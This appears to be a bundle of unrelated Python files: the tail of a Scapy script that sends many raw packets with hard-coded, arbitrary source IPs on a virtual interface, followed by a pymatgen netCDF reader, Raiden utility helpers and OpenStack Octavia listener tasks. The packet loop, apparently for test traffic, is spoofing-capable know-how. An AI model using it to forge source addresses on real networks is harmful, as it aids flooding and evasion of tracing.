p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '148.92.117.249', dst = '1.102.127.50') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '194.253.242.112', dst = '153.193.46.216') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '113.169.241.172', dst = '1.96.222.132') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '30.187.70.176', dst = '1.96.166.240') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '129.201.147.168', dst = '43.239.238.254') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '15.83.232.209', dst = '153.193.117.43') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.91.221.69', dst = '1.96.228.67') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.65.110.243', dst = '1.96.222.237') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '122.138.7.7', dst = '3.151.114.131') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '197.78.57.215', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.137.47.98', dst = '1.96.223.52') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '116.209.201.217', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '205.38.229.188', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.157.173.33', dst = '1.96.167.17') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '39.183.184.70', dst = '1.96.167.9') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '194.253.242.112', dst = '153.193.46.216') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '173.162.174.71', dst = '102.14.133.117') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.102', dst = '1.34.248.21') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '102.1.84.90', dst = '43.206.171.27') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.25.115.194', dst = '1.96.167.56') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.229.0.142', dst = '5.252.90.214') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.29.115.116', dst = '1.96.223.248') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.137.52.25', dst = '1.96.166.173') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '102.6.32.157', dst = '221.46.220.102') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '102.6.32.157', dst = '221.46.220.102') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '100.159.187.56', dst = '208.89.121.171') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '183.190.174.107', dst = '1.150.209.83') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.209.150.229', dst = '210.108.56.240') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '109.147.8.232', dst = '1.2.38.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.37.184.30', dst = '1.96.223.239') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '116.209.201.171', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '102.0.115.0', dst = '111.205.228.129') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '205.38.229.94', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '197.78.57.35', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.111.179.170', dst = '1.96.223.36') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '184.21.123.130', dst = '211.106.242.60') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.92.23.134', dst = '1.45.68.235') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.111.179.170', dst = '1.96.223.36') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '194.253.242.112', dst = '153.193.46.216') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.123', dst = '1.81.56.123') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '13.1.149.6', dst = '1.96.164.152') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.37.184.30', dst = '1.96.223.239') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.102', dst = '1.13.5.138') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.10.57.179', dst = '43.233.106.124') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '204.103.13.219', dst = '221.46.221.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.61.59.69', dst = '1.96.223.133') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.170', dst = '1.0.227.102') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '113.181.185.162', dst = '1.39.174.181') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '73.149.65.226', dst = '210.108.49.161') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.238.4.231', dst = '1.96.167.6') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '130.77.108.26', dst = '1.146.59.107') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.157.173.33', dst = '1.96.167.17') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.236.185.197', dst = '1.96.223.248') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '130.77.108.26', dst = '1.146.59.107') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '74.90.63.201', dst = '210.108.56.240') / msg
sendp(p, iface = "veth0", verbose = 0)
if __name__ == '__main__':
main()
|
|
# coding: utf-8
"""Wrapper for netCDF readers."""
from __future__ import unicode_literals, division, print_function
import os.path
from monty.dev import requires, deprecated
from monty.collections import AttrDict
from monty.functools import lazy_property
from pymatgen.core.units import ArrayWithUnit
from pymatgen.core.structure import Structure
import logging
logger = logging.getLogger(__name__)
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
__email__ = "gmatteo at gmail.com"
__status__ = "Development"
__date__ = "$Feb 21, 2013M$"
__all__ = [
"as_ncreader",
"as_etsfreader",
"NetcdfReader",
"ETSF_Reader",
"structure_from_ncdata",
]
try:
import netCDF4
except ImportError:
netCDF4 = None
def _asreader(file, cls):
closeit = False
if not isinstance(file, cls):
file, closeit = cls(file), True
return file, closeit
def as_ncreader(file):
"""
Convert file into a NetcdfReader instance.
Returns reader, closeit where closeit is set to True
if we have to close the file before leaving the procedure.
"""
return _asreader(file, NetcdfReader)
def as_etsfreader(file):
return _asreader(file, ETSF_Reader)
class NetcdfReaderError(Exception):
"""Base error class for NetcdfReader"""
class NO_DEFAULT(object):
"""Signal that read_value should raise an Error"""
class NetcdfReader(object):
"""
Wraps and extends netCDF4.Dataset. Read only mode. Supports with statements.
Additional documentation available at:
http://netcdf4-python.googlecode.com/svn/trunk/docs/netCDF4-module.html
"""
Error = NetcdfReaderError
@requires(netCDF4 is not None, "netCDF4 must be installed to use this class")
def __init__(self, path):
"""Open the Netcdf file specified by path (read mode)."""
self.path = os.path.abspath(path)
try:
self.rootgrp = netCDF4.Dataset(self.path, mode="r")
except Exception as exc:
raise self.Error("In file %s: %s" % (self.path, str(exc)))
self.ngroups = len(list(self.walk_tree()))
#self.path2group = collections.OrderedDict()
#for children in self.walk_tree():
# for child in children:
# #print(child.group, child.path)
# self.path2group[child.path] = child.group
def __enter__(self):
"""Activated when used in the with statement."""
return self
def __exit__(self, type, value, traceback):
"""Activated at the end of the with statement. It automatically closes the file."""
self.rootgrp.close()
def close(self):
try:
self.rootgrp.close()
except Exception as exc:
logger.warning("Exception %s while trying to close %s" % (exc, self.path))
#@staticmethod
#def pathjoin(*args):
# return "/".join(args)
def walk_tree(self, top=None):
"""
Navigate all the groups in the file starting from top.
If top is None, the root group is used.
"""
if top is None:
top = self.rootgrp
values = top.groups.values()
yield values
for value in top.groups.values():
for children in self.walk_tree(value):
yield children
def print_tree(self):
for children in self.walk_tree():
for child in children:
print(child)
def read_dimvalue(self, dimname, path="/"):
"""Returns the value of a dimension."""
dim = self._read_dimensions(dimname, path=path)[0]
return len(dim)
def read_varnames(self, path="/"):
"""List of variable names stored in the group specified by path."""
if path == "/":
return self.rootgrp.variables.keys()
else:
group = self.path2group[path]
return group.variables.keys()
def read_value(self, varname, path="/", cmode=None, default=NO_DEFAULT):
"""
Returns the values of variable with name varname in the group specified by path.
Args:
varname: Name of the variable
path: path to the group.
cmode: if cmode=="c", a complex ndarrays is constructed and returned
(netcdf does not provide native support from complex datatype).
default: read_value returns default if varname is not present.
Returns:
numpy array if varname represents an array, scalar otherwise.
"""
try:
var = self.read_variable(varname, path=path)
except self.Error:
if default is NO_DEFAULT: raise
return default
if cmode is None:
# scalar or array
# getValue is not portable!
try:
return var.getValue()[0] if not var.shape else var[:]
except IndexError:
return var.getValue() if not var.shape else var[:]
else:
assert var.shape[-1] == 2
if cmode == "c":
return var[...,0] + 1j*var[...,1]
else:
raise ValueError("Wrong value for cmode %s" % cmode)
def read_variable(self, varname, path="/"):
"""Returns the variable with name varname in the group specified by path."""
return self._read_variables(varname, path=path)[0]
def _read_dimensions(self, *dimnames, **kwargs):
path = kwargs.get("path", "/")
try:
if path == "/":
return [self.rootgrp.dimensions[dname] for dname in dimnames]
else:
group = self.path2group[path]
return [group.dimensions[dname] for dname in dimnames]
except KeyError:
raise self.Error("In file %s:\ndimnames %s, kwargs %s" % (self.path, dimnames, kwargs))
def _read_variables(self, *varnames, **kwargs):
path = kwargs.get("path", "/")
try:
if path == "/":
return [self.rootgrp.variables[vname] for vname in varnames]
else:
group = self.path2group[path]
return [group.variables[vname] for vname in varnames]
except KeyError:
raise self.Error("In file %s:\nvarnames %s, kwargs %s" % (self.path, varnames, kwargs))
def read_keys(self, keys, dict_cls=AttrDict, path="/"):
"""
Read a list of variables/dimensions from file. If a key is not present the corresponding
entry in the output dictionary is set to None.
"""
od = dict_cls()
for k in keys:
try:
# Try to read a variable.
od[k] = self.read_value(k, path=path)
except self.Error:
try:
# Try to read a dimension.
od[k] = self.read_dimvalue(k, path=path)
except self.Error:
od[k] = None
return od
class ETSF_Reader(NetcdfReader):
"""
This object reads data from a file written according to the ETSF-IO specifications.
We assume that the netcdf file contains at least the crystallographic section.
"""
@lazy_property
def chemical_symbols(self):
"""Chemical symbols char [number of atom species][symbol length]."""
symbols = self.read_value("chemical_symbols")
symbols = [s.decode("ascii") for s in symbols]
chemical_symbols = [str("".join(s)) for s in symbols]
return chemical_symbols
def typeidx_from_symbol(self, symbol):
"""Returns the type index from the chemical symbol. Note python convention."""
return self.chemical_symbols.index(symbol)
def read_structure(self, cls=Structure):
"""Returns the crystalline structure."""
if self.ngroups != 1:
raise NotImplementedError("In file %s: ngroups != 1" % self.path)
return structure_from_ncdata(self, cls=cls)
def structure_from_ncdata(ncdata, site_properties=None, cls=Structure):
"""
Reads and returns a pymatgen structure from a NetCDF file
containing crystallographic data in the ETSF-IO format.
Args:
ncdata: filename or NetcdfReader instance.
site_properties: Dictionary with site properties.
cls: The Structure class to instanciate.
"""
ncdata, closeit = as_ncreader(ncdata)
# TODO check whether atomic units are used
lattice = ArrayWithUnit(ncdata.read_value("primitive_vectors"), "bohr").to("ang")
red_coords = ncdata.read_value("reduced_atom_positions")
natom = len(red_coords)
znucl_type = ncdata.read_value("atomic_numbers")
# type_atom[0:natom] --> index Between 1 and number of atom species
type_atom = ncdata.read_value("atom_species")
# Fortran to C index and float --> int conversion.
species = natom * [None]
for atom in range(natom):
type_idx = type_atom[atom] - 1
species[atom] = int(znucl_type[type_idx])
d = {}
if site_properties is not None:
for prop in site_properties:
d[property] = ncdata.read_value(prop)
structure = cls(lattice, species, red_coords, site_properties=d)
# Quick and dirty hack.
# I need an abipy structure since I need to_abivars and other methods.
try:
from abipy.core.structure import Structure as AbipyStructure
structure.__class__ = AbipyStructure
except ImportError:
pass
if closeit:
ncdata.close()
return structure
|
|
# -*- coding: utf-8 -*-
import os
import re
import sys
import string
import time
import gevent
from coincurve import PrivateKey
from ethereum.utils import remove_0x_head
from sha3 import keccak_256
import raiden
LETTERS = string.printable
def safe_address_decode(address):
try:
address = safe_lstrip_hex(address)
address = address.decode('hex')
except TypeError:
pass
return address
def sha3(data):
"""
Raises:
RuntimeError: If Keccak lib initialization failed, or if the function
failed to compute the hash.
TypeError: This function does not accept unicode objects, they must be
encoded prior to usage.
"""
return keccak_256(data).digest()
def ishash(data):
return isinstance(data, (bytes, bytearray)) and len(data) == 32
def isaddress(data):
return isinstance(data, (bytes, bytearray)) and len(data) == 20
def pex(data):
return str(data).encode('hex')[:8]
def lpex(lst):
return [pex(l) for l in lst]
def activate_ultratb():
from IPython.core import ultratb
sys.excepthook = ultratb.VerboseTB(call_pdb=True, tb_offset=6)
def host_port_to_endpoint(host, port):
return '{}:{}'.format(host, port)
def split_endpoint(endpoint):
match = re.match(r'(?:[a-z0-9]*:?//)?([^:/]+)(?::(\d+))?', endpoint, re.I)
if not match:
raise ValueError('Invalid endpoint', endpoint)
host, port = match.groups()
if port:
port = int(port)
return (host, port)
def publickey_to_address(publickey):
return sha3(publickey[1:])[12:]
def privatekey_to_address(private_key_bin):
if not len(private_key_bin) == 32:
raise ValueError('private_key_bin format mismatch. maybe hex encoded?')
private_key = PrivateKey(private_key_bin)
pubkey = private_key.public_key.format(compressed=False)
return publickey_to_address(pubkey)
def get_project_root():
return os.path.dirname(raiden.__file__)
def get_contract_path(contract_name):
contract_path = os.path.join(
get_project_root(),
'smart_contracts',
contract_name
)
return os.path.realpath(contract_path)
def safe_lstrip_hex(val):
if isinstance(val, basestring):
return remove_0x_head(val)
return val
def get_encoded_transfers(their_transfer, our_transfer):
"""Check for input sanity and return the encoded version of the transfers"""
if not their_transfer and our_transfer:
raise ValueError(
'There is no reason to provide our_transfer when their_transfer'
' is not provided'
)
their_encoded = their_transfer.encode() if their_transfer else ''
our_encoded = our_transfer.encode() if our_transfer else ''
return their_encoded, our_encoded
def camel_to_snake_case(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def snake_to_camel_case(snake_string):
return snake_string.title().replace('_', '')
def channel_to_api_dict(channel):
"""Takes in a Channel Object and turns it into a dictionary for
usage in the REST API. Decoding from binary to hex happens through
the marshmallow AddressField in encoding.py.
"""
return {
'channel_address': channel.channel_address,
'token_address': channel.token_address,
'partner_address': channel.partner_address,
'settle_timeout': channel.settle_timeout,
'reveal_timeout': channel.reveal_timeout,
'balance': channel.distributable,
'state': channel.state
}
def fix_tester_storage(storage):
""" pyethereum tester doesn't follow the canonical storage encoding:
Both keys and values of the account storage associative array must be encoded with 64 hex
digits. Also account_to_dict() from pyethereum can return 0x for a storage
position. That is an invalid way of representing 0x0.
Args:
storage (dict): the storage dictionary from tester
Returns:
newstorage (dict): the canonical representation
"""
new_storage = dict()
for key, val in storage.iteritems():
new_key = '0x%064x' % int(key if key != '0x' else '0x0', 16)
new_val = '0x%064x' % int(val, 16)
new_storage[new_key] = new_val
return new_storage
def get_system_spec():
"""Collect informations about the system and installation.
"""
import pkg_resources
import raiden
import platform
system_spec = dict(
raiden=pkg_resources.require(raiden.__name__)[0].version,
python_implementation=platform.python_implementation(),
python_version=platform.python_version(),
system='{} {} {}'.format(
platform.system(),
'_'.join(platform.architecture()),
platform.release()
)
)
return system_spec
def wait_until(func, wait_for=None, sleep_for=0.5):
"""Test for a function and wait for it to return a truth value or to timeout.
Returns the value or None if a timeout is given and the function didn't return
inside time timeout
Args:
func (callable): a function to be evaluated, use lambda if parameters are required
wait_for (float, integer, None): the maximum time to wait, or None for an infinite loop
sleep_for (float, integer): how much to gevent.sleep between calls
Returns:
func(): result of func, if truth value, or None"""
res = func()
if res:
return res
if wait_for:
deadline = time.time() + wait_for
while not res and time.time() <= deadline:
gevent.sleep(sleep_for)
res = func()
else:
while not res:
gevent.sleep(sleep_for)
res = func()
return res
|
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from cryptography import fernet
from oslo_config import cfg
from oslo_log import log as logging
from stevedore import driver as stevedore_driver
from taskflow import retry
from taskflow import task
from taskflow.types import failure
from octavia.amphorae.backends.agent import agent_jinja_cfg
from octavia.amphorae.driver_exceptions import exceptions as driver_except
from octavia.common import constants
from octavia.common import utils
from octavia.controller.worker import task_utils as task_utilities
from octavia.db import api as db_apis
from octavia.db import repositories as repo
from octavia.network import data_models
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class BaseAmphoraTask(task.Task):
"""Base task to load drivers common to the tasks."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.amphora_driver = stevedore_driver.DriverManager(
namespace='octavia.amphora.drivers',
name=CONF.controller_worker.amphora_driver,
invoke_on_load=True
).driver
self.amphora_repo = repo.AmphoraRepository()
self.listener_repo = repo.ListenerRepository()
self.loadbalancer_repo = repo.LoadBalancerRepository()
self.task_utils = task_utilities.TaskUtils()
class AmpRetry(retry.Times):
def on_failure(self, history, *args, **kwargs):
last_errors = history[-1][1]
max_retry_attempt = CONF.haproxy_amphora.connection_max_retries
for task_name, ex_info in last_errors.items():
if len(history) <= max_retry_attempt:
# When taskflow persistance is enabled and flow/task state is
# saved in the backend. If flow(task) is restored(restart of
# worker,etc) we are getting ex_info as None - we need to RETRY
# task to check its real state.
if ex_info is None or ex_info._exc_info is None:
return retry.RETRY
excp = ex_info._exc_info[1]
if isinstance(excp, driver_except.AmpConnectionRetry):
return retry.RETRY
return retry.REVERT_ALL
class AmpListenersUpdate(BaseAmphoraTask):
"""Task to update the listeners on one amphora."""
def execute(self, loadbalancer, amphora, timeout_dict=None):
# Note, we don't want this to cause a revert as it may be used
# in a failover flow with both amps failing. Skip it and let
# health manager fix it.
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
try:
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(),
id=loadbalancer[constants.LOADBALANCER_ID])
self.amphora_driver.update_amphora_listeners(
db_lb, db_amp, timeout_dict)
except Exception as e:
LOG.error('Failed to update listeners on amphora %s. Skipping '
'this amphora as it is failing to update due to: %s',
db_amp.id, str(e))
self.amphora_repo.update(db_apis.get_session(), db_amp.id,
status=constants.ERROR)
class AmphoraIndexListenerUpdate(BaseAmphoraTask):
"""Task to update the listeners on one amphora."""
def execute(self, loadbalancer, amphora_index, amphorae, timeout_dict=()):
# Note, we don't want this to cause a revert as it may be used
# in a failover flow with both amps failing. Skip it and let
# health manager fix it.
try:
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(
db_apis.get_session(),
id=amphorae[amphora_index][constants.ID])
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(),
id=loadbalancer[constants.LOADBALANCER_ID])
self.amphora_driver.update_amphora_listeners(
db_lb, db_amp, timeout_dict)
except Exception as e:
amphora_id = amphorae[amphora_index].get(constants.ID)
LOG.error('Failed to update listeners on amphora %s. Skipping '
'this amphora as it is failing to update due to: %s',
amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
class ListenersUpdate(BaseAmphoraTask):
"""Task to update amphora with all specified listeners' configurations."""
def execute(self, loadbalancer_id):
"""Execute updates per listener for an amphora."""
loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
id=loadbalancer_id)
if loadbalancer:
self.amphora_driver.update(loadbalancer)
else:
LOG.error('Load balancer %s for listeners update not found. '
'Skipping update.', loadbalancer_id)
def revert(self, loadbalancer_id, *args, **kwargs):
"""Handle failed listeners updates."""
LOG.warning("Reverting listeners updates.")
loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
id=loadbalancer_id)
for listener in loadbalancer.listeners:
self.task_utils.mark_listener_prov_status_error(
listener.id)
class ListenersStart(BaseAmphoraTask):
"""Task to start all listeners on the vip."""
def execute(self, loadbalancer, amphora=None):
"""Execute listener start routines for listeners on an amphora."""
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
if db_lb.listeners:
if amphora is not None:
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
else:
db_amp = amphora
self.amphora_driver.start(db_lb, db_amp)
LOG.debug("Started the listeners on the vip")
def revert(self, loadbalancer, *args, **kwargs):
"""Handle failed listeners starts."""
LOG.warning("Reverting listeners starts.")
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
for listener in db_lb.listeners:
self.task_utils.mark_listener_prov_status_error(listener.id)
class AmphoraIndexListenersReload(BaseAmphoraTask):
"""Task to reload all listeners on an amphora."""
def execute(self, loadbalancer, amphora_index, amphorae,
timeout_dict=None):
"""Execute listener reload routines for listeners on an amphora."""
if amphorae is None:
return
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(
db_apis.get_session(), id=amphorae[amphora_index][constants.ID])
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(),
id=loadbalancer[constants.LOADBALANCER_ID])
if db_lb.listeners:
try:
self.amphora_driver.reload(db_lb, db_amp, timeout_dict)
except Exception as e:
amphora_id = amphorae[amphora_index][constants.ID]
LOG.warning('Failed to reload listeners on amphora %s. '
'Skipping this amphora as it is failing to '
'reload due to: %s', amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
class ListenerDelete(BaseAmphoraTask):
"""Task to delete the listener on the vip."""
def execute(self, listener):
"""Execute listener delete routines for an amphora."""
db_listener = self.listener_repo.get(
db_apis.get_session(), id=listener[constants.LISTENER_ID])
self.amphora_driver.delete(db_listener)
LOG.debug("Deleted the listener on the vip")
